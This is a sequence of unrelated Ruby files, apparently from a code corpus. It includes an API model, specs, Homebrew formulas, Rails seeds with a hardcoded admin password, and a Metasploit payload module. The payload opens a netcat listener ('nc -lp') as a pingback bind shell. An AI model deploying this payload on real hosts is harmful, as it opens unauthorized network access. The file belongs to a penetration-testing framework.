Generated by: https://github.com/swagger-api/swagger-codegen.git
Swagger Codegen version: 3.0.33
=end
require 'date'
module AmzSpApi::VendorDirectFulfillmentTransactionsV1
# The transaction status details.
class Transaction
# The unique identifier sent in the 'transactionId' field in response to the post request of a specific transaction.
attr_accessor :transaction_id
# Current processing status of the transaction.
attr_accessor :status
attr_accessor :errors
class EnumAttributeValidator
attr_reader :datatype
attr_reader :allowable_values
def initialize(datatype, allowable_values)
@allowable_values = allowable_values.map do |value|
case datatype.to_s
when /Integer/i
value.to_i
when /Float/i
value.to_f
else
value
end
end
end
def valid?(value)
!value || allowable_values.include?(value)
end
end
# Attribute mapping from ruby-style variable name to JSON key.
def self.attribute_map
{
:'transaction_id' => :'transactionId',
:'status' => :'status',
:'errors' => :'errors'
}
end
# Attribute type mapping.
def self.openapi_types
{
:'transaction_id' => :'Object',
:'status' => :'Object',
:'errors' => :'Object'
}
end
# List of attributes with nullable: true
def self.openapi_nullable
Set.new([
])
end
# Initializes the object
# @param [Hash] attributes Model attributes in the form of hash
def initialize(attributes = {})
if (!attributes.is_a?(Hash))
fail ArgumentError, "The input argument (attributes) must be a hash in `AmzSpApi::VendorDirectFulfillmentTransactionsV1::Transaction` initialize method"
end
# check to see if the attribute exists and convert string to symbol for hash key
attributes = attributes.each_with_object({}) { |(k, v), h|
if (!self.class.attribute_map.key?(k.to_sym))
fail ArgumentError, "`#{k}` is not a valid attribute in `AmzSpApi::VendorDirectFulfillmentTransactionsV1::Transaction`. Please check the name to make sure it's valid. List of attributes: " + self.class.attribute_map.keys.inspect
end
h[k.to_sym] = v
}
if attributes.key?(:'transaction_id')
self.transaction_id = attributes[:'transaction_id']
end
if attributes.key?(:'status')
self.status = attributes[:'status']
end
if attributes.key?(:'errors')
self.errors = attributes[:'errors']
end
end
# Show invalid properties with the reasons. Usually used together with valid?
# @return Array for valid properties with the reasons
def list_invalid_properties
invalid_properties = Array.new
if @transaction_id.nil?
invalid_properties.push('invalid value for "transaction_id", transaction_id cannot be nil.')
end
if @status.nil?
invalid_properties.push('invalid value for "status", status cannot be nil.')
end
invalid_properties
end
# Check to see if the all the properties in the model are valid
# @return true if the model is valid
def valid?
return false if @transaction_id.nil?
return false if @status.nil?
status_validator = EnumAttributeValidator.new('Object', ['Failure', 'Processing', 'Success'])
return false unless status_validator.valid?(@status)
true
end
# Custom attribute writer method checking allowed values (enum).
# @param [Object] status Object to be assigned
def status=(status)
validator = EnumAttributeValidator.new('Object', ['Failure', 'Processing', 'Success'])
unless validator.valid?(status)
fail ArgumentError, "invalid value for \"status\", must be one of #{validator.allowable_values}."
end
@status = status
end
# Checks equality by comparing each attribute.
# @param [Object] Object to be compared
def ==(o)
return true if self.equal?(o)
self.class == o.class &&
transaction_id == o.transaction_id &&
status == o.status &&
errors == o.errors
end
# @see the `==` method
# @param [Object] Object to be compared
def eql?(o)
self == o
end
# Calculates hash code according to all attributes.
# @return [Integer] Hash code
def hash
[transaction_id, status, errors].hash
end
# Builds the object from hash
# @param [Hash] attributes Model attributes in the form of hash
# @return [Object] Returns the model itself
def self.build_from_hash(attributes)
new.build_from_hash(attributes)
end
# Builds the object from hash
# @param [Hash] attributes Model attributes in the form of hash
# @return [Object] Returns the model itself
def build_from_hash(attributes)
return nil unless attributes.is_a?(Hash)
self.class.openapi_types.each_pair do |key, type|
if type =~ /\AArray<(.*)>/i
# check to ensure the input is an array given that the attribute
# is documented as an array but the input is not
if attributes[self.class.attribute_map[key]].is_a?(Array)
self.send("#{key}=", attributes[self.class.attribute_map[key]].map { |v| _deserialize($1, v) })
end
elsif !attributes[self.class.attribute_map[key]].nil?
self.send("#{key}=", _deserialize(type, attributes[self.class.attribute_map[key]]))
elsif attributes[self.class.attribute_map[key]].nil? && self.class.openapi_nullable.include?(key)
self.send("#{key}=", nil)
end
end
self
end
# Deserializes the data based on type
# @param string type Data type
# @param string value Value to be deserialized
# @return [Object] Deserialized data
def _deserialize(type, value)
case type.to_sym
when :DateTime
DateTime.parse(value)
when :Date
Date.parse(value)
when :String
value.to_s
when :Integer
value.to_i
when :Float
value.to_f
when :Boolean
if value.to_s =~ /\A(true|t|yes|y|1)\z/i
true
else
false
end
when :Object
# generic object (usually a Hash), return directly
value
when /\AArray<(?<inner_type>.+)>\z/
inner_type = Regexp.last_match[:inner_type]
value.map { |v| _deserialize(inner_type, v) }
when /\AHash<(?<k_type>.+?), (?<v_type>.+)>\z/
k_type = Regexp.last_match[:k_type]
v_type = Regexp.last_match[:v_type]
{}.tap do |hash|
value.each do |k, v|
hash[_deserialize(k_type, k)] = _deserialize(v_type, v)
end
end
else # model
AmzSpApi::VendorDirectFulfillmentTransactionsV1.const_get(type).build_from_hash(value)
end
end
# Returns the string representation of the object
# @return [String] String presentation of the object
def to_s
to_hash.to_s
end
# to_body is an alias to to_hash (backward compatibility)
# @return [Hash] Returns the object in the form of hash
def to_body
to_hash
end
# Returns the object in the form of hash
# @return [Hash] Returns the object in the form of hash
def to_hash
hash = {}
self.class.attribute_map.each_pair do |attr, param|
value = self.send(attr)
if value.nil?
is_nullable = self.class.openapi_nullable.include?(attr)
next if !is_nullable || (is_nullable && !instance_variable_defined?(:"@#{attr}"))
end
hash[param] = _to_hash(value)
end
hash
end
# Outputs non-array value in the form of hash
# For object, use to_hash. Otherwise, just return the value
# @param [Object] value Any valid value
# @return [Hash] Returns the value in the form of hash
def _to_hash(value)
if value.is_a?(Array)
value.compact.map { |v| _to_hash(v) }
elsif value.is_a?(Hash)
{}.tap do |hash|
value.each { |k, v| hash[k] = _to_hash(v) }
end
elsif value.respond_to? :to_hash
value.to_hash
else
value
end
end end
end
| 31.492647 | 238 | 0.634368 |
f793c84700676c02cb1245a60458a575fd519887
| 1,255 |
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/base/sessions/pingback'
module MetasploitModule
CachedSize = 103
include Msf::Payload::Single
include Msf::Payload::Pingback
include Msf::Payload::Pingback::Options
def initialize(info = {})
super(merge_info(info,
'Name' => 'Unix Command Shell, Pingback Bind TCP (via netcat)',
'Description' => 'Accept a connection, send a UUID, then exit',
'Author' =>
[
'asoto-r7'
],
'License' => MSF_LICENSE,
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Handler' => Msf::Handler::BindTcp,
'Session' => Msf::Sessions::Pingback,
'PayloadType' => 'cmd',
'RequiredCmd' => 'netcat'
))
end
#
# Constructs the payload
#
def generate
super.to_s + command_string
end
#
# Returns the command string to use for execution
#
def command_string
self.pingback_uuid ||= self.generate_pingback_uuid
"printf '#{pingback_uuid.scan(/../).map { |x| "\\x" + x }.join}' | (nc -lp #{datastore['LPORT']} || nc -l #{datastore['LPORT']})"
end
end
| 25.612245 | 133 | 0.594422 |
08a5632f930f7009e935af1ef62d5f34e8e1fb14
| 44 |
module CivicSummary
VERSION = '0.0.1'
end
| 11 | 19 | 0.704545 |
6249d0ab1f23492240dd44e8f5323ad07a630759
| 1,407 |
#-- copyright
# OpenProject Global Roles Plugin
#
# Copyright (C) 2010 - 2014 the OpenProject Foundation (OPF)
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# version 3.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#++
require File.dirname(__FILE__) + '/../spec_helper'
describe Principal, type: :model do
describe 'ATTRIBUTES' do
before :each do
end
it { is_expected.to have_many :principal_roles }
it { is_expected.to have_many :global_roles }
end
describe 'WHEN deleting a principal' do
let(:principal) { FactoryBot.build(:user) }
let(:role) { FactoryBot.build(:global_role) }
before do
FactoryBot.create(:principal_role, role: role,
principal: principal)
principal.destroy
end
it { expect(Role.find_by_id(role.id)).to eq(role) }
it { expect(PrincipalRole.where(id: principal.id)).to eq([]) }
end
end
| 31.266667 | 81 | 0.697939 |
bf33bffe64ac5b5e1e1d346067a117045797f494
| 648 |
# This file should contain all the record creation needed to seed the database with its default values.
# The data can then be loaded with the rake db:seed (or created alongside the db with db:setup).
#
# Examples:
#
# cities = City.create([{ name: 'Chicago' }, { name: 'Copenhagen' }])
# Mayor.create(name: 'Emanuel', city: cities.first)
#
%w(user admin guest).each do |role|
Role.find_or_create_by(name: role)
end
User.create email: '[email protected]', password: '*Test123', role: Role.where(name: 'admin').first, approved: true
User.create email: 'anonymous', password: '*Test123', role: Role.where(name: 'guest').first, approved: false
| 43.2 | 115 | 0.714506 |
62d57e1659333145ee16d5140a0b4580a460485c
| 197 |
class AddOrganizationalDataToCourse < ActiveRecord::Migration[5.2]
def change
add_column :courses, :organizational, :boolean
add_column :courses, :organizational_concept, :text
end
end
| 28.142857 | 66 | 0.77665 |
e8be6cd6014658ba0a6c9f2a579386889ea5b8b8
| 5,587 |
require 'faraday'
require 'glue/finding'
require 'glue/reporters/base_reporter'
require 'jira-ruby'
require 'slack-ruby-client'
require 'glue/util'
require 'glue/env_helper'
# In IRB
# require 'slack-ruby-client'
# Slack.configure do |config|
# config.token = "token"
# end
# client = Slack::Web::Client.new
# client.chat_postMessage(channel: 'channel_name', text: "message_text", attachments: json_attachment, as_user: post_as_user)
PATHNAME_REGEX = %r{(\.\/|#<Pathname:)(?<file_path>.*)(?<file_ext>\.py|\.java|\.class|\.js|\.ts|.xml)(>)?}
class Glue::SlackReporter < Glue::BaseReporter
Glue::Reporters.add self
include Glue::Util
include Glue::EnvHelper
attr_accessor :name, :format
def initialize
@name = 'SlackReporter'
@format = :to_slack
@currentpath = __dir__
@git_env = get_git_environment
# OWASP Dependency Check specific settings
if is_label?('java', @tracker) || is_task?('owaspdependencycheck', @tracker)
@sbt_path = @tracker.options[:sbt_path]
@scala_project = @tracker.options[:scala_project]
@gradle_project = @tracker.options[:gradle_project]
@maven_project = @tracker.options[:maven_project]
end
end
def get_slack_attachment_json(finding, tracker)
Glue.notify '**** Generating report data'
json = {
"fallback": 'Results of OWASP Glue test for repository' + tracker.options[:appname] + ':',
"color": slack_priority(finding.severity),
"title": finding.description.to_s,
"title_link": finding.detail.to_s,
"text": finding.detail.to_s
}
end
def get_slack_attachment_text(finding, _tracker)
Glue.notify '**** Generating text attachment'
text =
'Link: ' + bitbucket_linker(finding) + "\n" \
'Vulnerability: ' + finding.description.to_s + "\n" \
'Severity:' + slack_priority(finding.severity).to_s + " \n" \
'Detail: ' + "\n" + finding.detail.to_s << "\n"
end
def run_report(tracker)
post_as_user = false unless tracker.options[:slack_post_as_user]
mandatory = %i[slack_token slack_channel]
missing = mandatory.select { |param| tracker.options[param].nil? }
unless missing.empty?
Glue.fatal "missing one or more required params: #{missing}"
return
end
Slack.configure do |config|
config.token = tracker.options[:slack_token]
end
client = Slack::Web::Client.new
begin
client.auth_test
rescue Slack::Web::Api::Error => e
Glue.fatal 'Slack authentication failed: ' << e.to_s
end
reports = []
if tracker.findings.length.zero?
Glue.notify '**** No issues found, skipping report generation...'
else
Glue.notify '**** Running base HTML report'
reports = []
report_filename = "report_#{tracker.options[:appname]}"
template = ERB.new File.read("#{@currentpath}/html_template.erb")
Glue.notify '**** Rendering HTML'
reports << template.result(binding) # ZOZZISSIMO TODO Da sistemare il binding
File.open("#{report_filename}.html", 'w+') { |f| f.write reports.join("\n") }
# runs command to render to PDF
Glue.notify '**** Rendering PDF'
command = "wkhtmltopdf --encoding utf-8 #{report_filename}.html #{report_filename}.pdf"
runsystem(true, command)
end
puts tracker.options[:slack_channel]
begin
Glue.notify '**** Uploading message to Slack'
issue_number = tracker.findings.length
if tracker.findings.length.zero?
Glue.notify '**** No issues found, skipping send report.'
else
Glue.notify '**** Uploading message and attachment to Slack'
client.chat_postMessage(
channel: tracker.options[:slack_channel],
text: 'OWASP Glue has found ' + issue_number.to_s + ' vulnerabilities in *' + tracker.options[:appname] + "* : #{@git_env[:commit]} . \n Here's a summary: \n Link to repo: #{@git_env[:url]}/commits/#{@git_env[:commit]}",
as_user: post_as_user
)
client.files_upload(
channels: tracker.options[:slack_channel],
as_user: true,
file: Faraday::UploadIO.new("#{report_filename}.pdf", 'pdf'),
filetype: 'pdf',
filename: "#{tracker.options[:appname]}.pdf"
)
# if @tracker[:labels].include? 'java' or @tracker[:tasks].include? 'owaspdependencycheck'
# path = if @scala_project
# #md = @result.match(/\e\[0m\[\e\[0minfo\e\[0m\] \e\[0mWriting reports to (?<report_path>.*)\e\[0m/)
# #md[:report_path] + "/dependency-check-report.xml"
# report_directory = @sbt_settings.match(/.*dependencyCheckOutputDirectory: (?<report_path>.*)\e\[0m/)
# report_directory[:report_path] + "/dependency-check-report.xml"
# elsif @gradle_project
# @trigger.path + "/build/reports/dependency-check-report.xml"
# elsif @maven_project
# @trigger.path + "target/dependency-check-report.xml"
# else
# @trigger.path + "/dependency-check-report.xml"
# end
# client.files_upload(
# channels: tracker.options[:slack_channel],
# as_user: true,
# file: Faraday::UploadIO.new("#{report_filename}.pdf", 'pdf'),
# filetype: 'pdf',
# filename: "dep_check_#{tracker.options[:appname]}.pdf"
# )
# end
end
rescue Slack::Web::Api::Error => e
Glue.fatal '***** Post to slack failed: ' << e.to_s
rescue StandardError => e
Glue.fatal '***** Unknown error: ' << e.to_s
end
end
end
| 36.756579 | 230 | 0.632182 |
61b7d76c569060d04e35a87991a70c1a3aaf96a7
| 291 |
require 'open-uri'
class StoriesController < ApplicationController
def index
@stories = HackerNewsAPI.new(story_params).stories
end
def show
@story = HackerNewsAPI.new(story_params).story
end
private
def story_params
params.permit :category, :page, :id
end
end
| 16.166667 | 54 | 0.728522 |
f898b1d2d818165c7e97c176dcf48843f19a3db8
| 1,225 |
require File.dirname(__FILE__) + '/spec_helper'
describe Rack::Throttle::Interval do
include Rack::Test::Methods
def app
@target_app ||= example_target_app
@app ||= Rack::Throttle::Interval.new(@target_app, :min => 0.1)
end
it "should allow the request if the source has not been seen" do
get "/foo"
last_response.body.should show_allowed_response
end
it "should allow the request if the source has not been seen in the current interval" do
get "/foo"
sleep 0.2 # Should time travel this instead?
get "/foo"
last_response.body.should show_allowed_response
end
it "should not all the request if the source has been seen inside the current interval" do
2.times { get "/foo" }
last_response.body.should show_throttled_response
end
it "should gracefully allow the request if the cache bombs on getting" do
app.should_receive(:cache_get).and_raise(StandardError)
get "/foo"
last_response.body.should show_allowed_response
end
it "should gracefully allow the request if the cache bombs on setting" do
app.should_receive(:cache_set).and_raise(StandardError)
get "/foo"
last_response.body.should show_allowed_response
end
end
| 30.625 | 92 | 0.725714 |
b926303d1361da887e4979cbac4dacff5e0fe438
| 8,477 |
require 'formula'
class Subversion < Formula
homepage 'https://subversion.apache.org/'
url 'http://www.apache.org/dyn/closer.cgi?path=subversion/subversion-1.8.10.tar.bz2'
mirror 'http://archive.apache.org/dist/subversion/subversion-1.8.10.tar.bz2'
sha1 'd6896d94bb53c1b4c6e9c5bb1a5c466477b19b2b'
revision 1
bottle do
revision 4
sha1 "91915d626c5e843b2a035e4cfa00898c6c79b353" => :yosemite
sha1 "c0d4416a5dc4db63d37bbfae2af29538699b28ca" => :mavericks
sha1 "7b78b1abd3bb77ef8ee8f711d3bbc0eec8a9390a" => :mountain_lion
end
option :universal
option 'java', 'Build Java bindings'
option 'perl', 'Build Perl bindings'
option 'ruby', 'Build Ruby bindings'
resource 'serf' do
url 'https://serf.googlecode.com/svn/src_releases/serf-1.3.7.tar.bz2', :using => :curl
sha1 'db9ae339dba10a2b47f9bdacf30a58fd8e36683a'
end
depends_on "pkg-config" => :build
# Always build against Homebrew versions instead of system versions for consistency.
depends_on 'sqlite'
depends_on :python => :optional
# Bindings require swig
depends_on 'swig' if build.include? 'perl' or build.with? 'python' or build.include? 'ruby'
# For Serf
depends_on 'scons' => :build
depends_on 'openssl'
# If building bindings, allow non-system interpreters
env :userpaths if build.include? 'perl' or build.include? 'ruby'
# Fix #23993 by stripping flags swig can't handle from SWIG_CPPFLAGS
# Prevent '-arch ppc' from being pulled in from Perl's $Config{ccflags}
patch :DATA
# When building Perl or Ruby bindings, need to use a compiler that
# recognizes GCC-style switches, since that's what the system languages
# were compiled against.
fails_with :clang do
build 318
cause "core.c:1: error: bad value (native) for -march= switch"
end if build.include? 'perl' or build.include? 'ruby'
def install
serf_prefix = libexec+'serf'
resource('serf').stage do
# SConstruct merges in gssapi linkflags using scons's MergeFlags,
# but that discards duplicate values - including the duplicate
# values we want, like multiple -arch values for a universal build.
# Passing 0 as the `unique` kwarg turns this behaviour off.
inreplace 'SConstruct', 'unique=1', 'unique=0'
ENV.universal_binary if build.universal?
# scons ignores our compiler and flags unless explicitly passed
args = %W[PREFIX=#{serf_prefix} GSSAPI=/usr CC=#{ENV.cc}
CFLAGS=#{ENV.cflags} LINKFLAGS=#{ENV.ldflags}
OPENSSL=#{Formula["openssl"].opt_prefix}]
scons *args
scons "install"
end
if build.include? 'unicode-path'
raise <<-EOS.undent
The --unicode-path patch is not supported on Subversion 1.8.
Upgrading from a 1.7 version built with this patch is not supported.
You should stay on 1.7, install 1.7 from homebrew-versions, or
brew rm subversion && brew install subversion
to build a new version of 1.8 without this patch.
EOS
end
if build.include? 'java'
# Java support doesn't build correctly in parallel:
# https://github.com/Homebrew/homebrew/issues/20415
ENV.deparallelize
unless build.universal?
opoo "A non-Universal Java build was requested."
puts "To use Java bindings with various Java IDEs, you might need a universal build:"
puts " brew install subversion --universal --java"
end
if ENV["JAVA_HOME"]
opoo "JAVA_HOME is set. Try unsetting it if JNI headers cannot be found."
end
end
ENV.universal_binary if build.universal?
# Use existing system zlib
# Use dep-provided other libraries
# Don't mess with Apache modules (since we're not sudo)
args = ["--disable-debug",
"--prefix=#{prefix}",
"--with-apr=#{which("apr-1-config").dirname}",
"--with-zlib=/usr",
"--with-sqlite=#{Formula["sqlite"].opt_prefix}",
"--with-serf=#{serf_prefix}",
"--disable-mod-activation",
"--disable-nls",
"--without-apache-libexecdir",
"--without-berkeley-db"]
args << "--enable-javahl" << "--without-jikes" if build.include? 'java'
if build.include? 'ruby'
args << "--with-ruby-sitedir=#{lib}/ruby"
# Peg to system Ruby
args << "RUBY=/usr/bin/ruby"
end
# The system Python is built with llvm-gcc, so we override this
# variable to prevent failures due to incompatible CFLAGS
ENV['ac_cv_python_compile'] = ENV.cc
inreplace 'Makefile.in',
'toolsdir = @bindir@/svn-tools',
'toolsdir = @libexecdir@/svn-tools'
system "./configure", *args
system "make"
system "make install"
bash_completion.install 'tools/client-side/bash_completion' => 'subversion'
system "make tools"
system "make install-tools"
if build.with? 'python'
system "make swig-py"
system "make install-swig-py"
end
if build.include? 'perl'
# In theory SWIG can be built in parallel, in practice...
ENV.deparallelize
# Remove hard-coded ppc target, add appropriate ones
if build.universal?
arches = Hardware::CPU.universal_archs.as_arch_flags
elsif MacOS.version <= :leopard
arches = "-arch #{Hardware::CPU.arch_32_bit}"
else
arches = "-arch #{Hardware::CPU.arch_64_bit}"
end
perl_core = Pathname.new(`perl -MConfig -e 'print $Config{archlib}'`)+'CORE'
unless perl_core.exist?
onoe "perl CORE directory does not exist in '#{perl_core}'"
end
inreplace "Makefile" do |s|
s.change_make_var! "SWIG_PL_INCLUDES",
"$(SWIG_INCLUDES) #{arches} -g -pipe -fno-common -DPERL_DARWIN -fno-strict-aliasing -I/usr/local/include -I#{perl_core}"
end
system "make swig-pl"
system "make", "install-swig-pl", "DESTDIR=#{prefix}"
# Some of the libraries get installed into the wrong place, they end up having the
# prefix in the directory name twice.
lib.install Dir["#{prefix}/#{lib}/*"]
end
if build.include? 'java'
system "make javahl"
system "make install-javahl"
end
if build.include? 'ruby'
# Peg to system Ruby
system "make swig-rb EXTRA_SWIG_LDFLAGS=-L/usr/lib"
system "make install-swig-rb"
end
end
test do
system "#{bin}/svnadmin", 'create', 'test'
system "#{bin}/svnadmin", 'verify', 'test'
end
def caveats
s = <<-EOS.undent
svntools have been installed to:
#{opt_libexec}
EOS
if build.include? 'perl'
s += <<-EOS.undent
The perl bindings are located in various subdirectories of:
#{prefix}/Library/Perl
EOS
end
if build.include? 'ruby'
s += <<-EOS.undent
You may need to add the Ruby bindings to your RUBYLIB from:
#{HOMEBREW_PREFIX}/lib/ruby
EOS
end
if build.include? 'java'
s += <<-EOS.undent
You may need to link the Java bindings into the Java Extensions folder:
sudo mkdir -p /Library/Java/Extensions
sudo ln -s #{HOMEBREW_PREFIX}/lib/libsvnjavahl-1.dylib /Library/Java/Extensions/libsvnjavahl-1.dylib
EOS
end
return s.empty? ? nil : s
end
end
__END__
diff --git a/configure b/configure
index 445251b..3ed9485 100755
--- a/configure
+++ b/configure
@@ -25205,6 +25205,8 @@ fi
SWIG_CPPFLAGS="$CPPFLAGS"
SWIG_CPPFLAGS=`echo "$SWIG_CPPFLAGS" | $SED -e 's/-no-cpp-precomp //'`
+ SWIG_CPPFLAGS=`echo "$SWIG_CPPFLAGS" | $SED -e 's/-F\/[^ ]* //'`
+ SWIG_CPPFLAGS=`echo "$SWIG_CPPFLAGS" | $SED -e 's/-isystem\/[^ ]* //'`
diff --git a/subversion/bindings/swig/perl/native/Makefile.PL.in b/subversion/bindings/swig/perl/native/Makefile.PL.in
index a60430b..bd9b017 100644
--- a/subversion/bindings/swig/perl/native/Makefile.PL.in
+++ b/subversion/bindings/swig/perl/native/Makefile.PL.in
@@ -76,10 +76,13 @@ my $apr_ldflags = '@SVN_APR_LIBS@'
chomp $apr_shlib_path_var;
+my $config_ccflags = $Config{ccflags};
+$config_ccflags =~ s/-arch\s+\S+//g;
+
my %config = (
ABSTRACT => 'Perl bindings for Subversion',
DEFINE => $cppflags,
- CCFLAGS => join(' ', $cflags, $Config{ccflags}),
+ CCFLAGS => join(' ', $cflags, $config_ccflags),
INC => join(' ', $includes, $cppflags,
" -I$swig_srcdir/perl/libsvn_swig_perl",
" -I$svnlib_srcdir/include",
| 32.354962 | 130 | 0.64905 |
189ce05df3e570c129b67bd37407bd64008c8fce
| 1,086 |
require "helper"
class TestCoffeeScript < JekyllUnitTest
context "converting CoffeeScript" do
setup do
External.require_with_graceful_fail("jekyll-coffeescript")
@site = fixture_site
@site.process
@test_coffeescript_file = dest_dir("js/coffeescript.js")
@js_output = <<-JS
(function() {
$(function() {
var cube, cubes, list, num, square;
list = [1, 2, 3, 4, 5];
square = function(x) {
return x * x;
};
cube = function(x) {
return square(x) * x;
};
cubes = (function() {
var i, len, results;
results = [];
for (i = 0, len = list.length; i < len; i++) {
num = list[i];
results.push(math.cube(num));
}
return results;
})();
if (typeof elvis !== "undefined" && elvis !== null) {
return alert("I knew it!");
}
});
}).call(this);
JS
end
should "write a JS file in place" do
assert_exist @test_coffeescript_file
end
should "produce JS" do
assert_equal @js_output, File.read(@test_coffeescript_file)
end
end
end
| 22.625 | 65 | 0.575506 |
62b214081040a6540ce19ad4857274b3e0db1557
| 1,385 |
class Lout < Formula
desc "Text formatting like TeX, but simpler"
homepage "https://savannah.nongnu.org/projects/lout"
url "https://download.savannah.gnu.org/releases/lout/lout-3.40.tar.gz"
sha256 "3d16f1ce3373ed96419ba57399c2e4d94f88613c2cb4968cb0331ecac3da68bd"
bottle do
sha256 "2de1b1b7526f7427b8a57b6239a5a8c199ee05365ead7ed8d722a9e7e3123a0e" => :high_sierra
sha256 "2cfc68ddba21e6f485a4a57df9e810b6996d5364374c66e77b06d41ce230f060" => :sierra
sha256 "2fbc90ffc3f12312dc11e31996ba94da3b8a4ba1c55f33ca60a5d81aef4e137f" => :el_capitan
sha256 "366023d41536d0220a3d226a9f7a5e65b89fcf8ec212bfd6e53f8c2b4110abce" => :yosemite
sha256 "7cbcdcbf720e5e93c7e8d41861fedbcb0f1b46233414c7897e94671e4e42a9fa" => :mavericks
sha256 "9d3b44fdc1f1aa2f01ece78c63ad8084897d27758cf72cfbdef6f876c0c7a0cb" => :mountain_lion
end
def install
bin.mkpath
man1.mkpath
(doc/"lout").mkpath
system "make", "PREFIX=#{prefix}", "LOUTLIBDIR=#{lib}", "LOUTDOCDIR=#{doc}", "MANDIR=#{man}", "allinstall"
end
test do
input = "test.lout"
(testpath/input).write <<-EOS.undent
@SysInclude { doc }
@Doc @Text @Begin
@Display @Heading { Blindtext }
The quick brown fox jumps over the lazy dog.
@End @Text
EOS
assert_match /^\s+Blindtext\s+The quick brown fox.*\n+$/, shell_output("#{bin}/lout -p #{input}")
end
end
| 39.571429 | 110 | 0.741516 |
914cf42d432970dbc7565857616c20d691b790ef
| 1,594 |
lib = File.expand_path('lib', __dir__)
$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
require 'libhoney/version'
Gem::Specification.new do |spec|
spec.name = 'libhoney'
spec.version = Libhoney::VERSION
spec.summary = 'send data to Honeycomb'
spec.description = 'Ruby gem for sending data to Honeycomb'
spec.authors = ['The Honeycomb.io Team']
spec.email = '[email protected]'
spec.homepage = 'https://github.com/honeycombio/libhoney-rb'
spec.license = 'Apache-2.0'
spec.files = `git ls-files -z`.split("\x0").reject do |f|
f.match(%r{^(test|spec|features)/})
end
spec.bindir = 'exe'
spec.executables = spec.files.grep(%r{^exe/}) { |f| File.basename(f) }
spec.require_paths = ['lib']
spec.required_ruby_version = '>= 2.4.0'
spec.add_development_dependency 'bump', '~> 0.5'
spec.add_development_dependency 'bundler'
spec.add_development_dependency 'lockstep'
spec.add_development_dependency 'minitest', '~> 5.0'
spec.add_development_dependency 'minitest-reporters'
spec.add_development_dependency 'rake', '~> 13.0'
spec.add_development_dependency 'rubocop', '1.12.1'
spec.add_development_dependency 'sinatra'
spec.add_development_dependency 'sinatra-contrib'
spec.add_development_dependency 'spy', '~> 1.0'
spec.add_development_dependency 'webmock', '~> 3.4'
spec.add_development_dependency 'yard'
spec.add_development_dependency 'yardstick', '~> 0.9'
spec.add_dependency 'addressable', '~> 2.0'
spec.add_dependency 'excon'
spec.add_dependency 'http', '>= 2.0', '< 6.0'
end
| 37.952381 | 74 | 0.70138 |
5df27d0d7bb678ce54013af6cc12141bfd6a46a9
| 2,108 |
module Spree
module BlogEntriesHelper
def post_link_list
link = Struct.new(:name,:url)
BlogEntry.recent.collect { |post| link.new( post.title, blog_entry_permalink(post)) }
end
def blog_entry_split_title(e)
e.split(" ").join("<br/>").html_safe
end
def blog_entry_permalink(e)
unless e.published_at.nil?
blog_entry_permalink_path year: e.published_at.strftime("%Y"), month: e.published_at.strftime("%m"), day: e.published_at.strftime("%d"), slug: e.permalink
else
blog_entry_permalink_path year: "na", month: "na", day: "na", slug: e.permalink
end
end
def blog_entry_url_permalink(e)
unless e.published_at.nil?
blog_entry_permalink_url year: e.published_at.strftime("%Y"), month: e.published_at.strftime("%m"), day: e.published_at.strftime("%d"), slug: e.permalink
else
blog_entry_permalink_url year: "na", month: "na", day: "na", slug: e.permalink
end
end
def blog_full_article_html(blog_entry)
"<br><br>Read the full article #{link_to blog_entry.title, blog_entry_url_permalink(blog_entry)} at #{link_to "#{Spree::current_store.name} Blog", blog_url}."
end
def blog_first_appeared_html(blog_entry)
"<br><br>The article #{link_to blog_entry.title, blog_entry_url_permalink(blog_entry)} first appeared on #{link_to "#{Spree::current_store.name} Blog", blog_url}."
end
def blog_entry_tag_list_html blog_entry
blog_entry.tag_list.map {|tag| link_to tag, blog_tag_path(tag) }.join(", ").html_safe
end
def blog_entry_category_list_html blog_entry
blog_entry.category_list.map {|category| link_to category, blog_category_path(category) }.join(", ").html_safe
end
def tag_cloud(tags, classes)
return [] if tags.blank?
max_count = tags.sort_by(&:count).last.count.to_f
tags.each do |tag|
index = ((tag.count / max_count) * (classes.size - 1))
yield tag, classes[index.nan? ? 0 : index.round]
end
end
def markdown(source)
source.markdown_to_html rescue ''
end
end
end
| 36.344828 | 169 | 0.679317 |
334db2155a9a40c43f41cbdbf9a5a7694d57a1ae
| 1,322 |
require_relative 'boot'
require "rails"
# Pick the frameworks you want:
require "active_model/railtie"
require "active_job/railtie"
require "active_record/railtie"
require "active_storage/engine"
require "action_controller/railtie"
require "action_mailer/railtie"
require "action_mailbox/engine"
require "action_text/engine"
require "action_view/railtie"
require "action_cable/engine"
# require "sprockets/railtie"
require "rails/test_unit/railtie"
require 'json'
# Require the gems listed in Gemfile, including any gems
# you've limited to :test, :development, or :production.
Bundler.require(*Rails.groups)
module Backend
class Application < Rails::Application
# Initialize configuration defaults for originally generated Rails version.
config.load_defaults 6.0
# Settings in config/environments/* take precedence over those specified here.
# Application configuration can go into files in config/initializers
# -- all .rb files in that directory are automatically loaded after loading
# the framework and any gems in your application.
# Only loads a smaller set of middleware suitable for API only apps.
# Middleware like session, flash, cookies can be added back manually.
# Skip views, helpers and assets when generating a new resource.
config.api_only = true
end
end
| 33.897436 | 82 | 0.776853 |
f753f12ff2048091fa5cbdb0bb404ea8d095cc0d
| 1,325 |
# coding: utf-8
lib = File.expand_path('../lib', __FILE__)
$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
require 'runnerbean/version'
Gem::Specification.new do |spec|
spec.name = 'runnerbean'
spec.version = Runnerbean::VERSION
spec.authors = ['baob']
spec.email = ['[email protected]']
spec.summary = 'Automates starting and stopping processes for testing.'
# spec.description = %q{TODO: Write a longer description. Optional.}
spec.homepage = ''
spec.license = 'MIT'
spec.files = `git ls-files -z`.split("\x0")
spec.executables = spec.files.grep(%r{^bin/}) { |f| File.basename(f) }
spec.test_files = spec.files.grep(%r{^(test|spec|features)/})
spec.require_paths = ['lib']
spec.add_development_dependency 'bundler', '~> 1.7'
spec.add_development_dependency 'rake', '~> 10.0'
spec.add_development_dependency 'rspec'
spec.add_development_dependency 'guard'
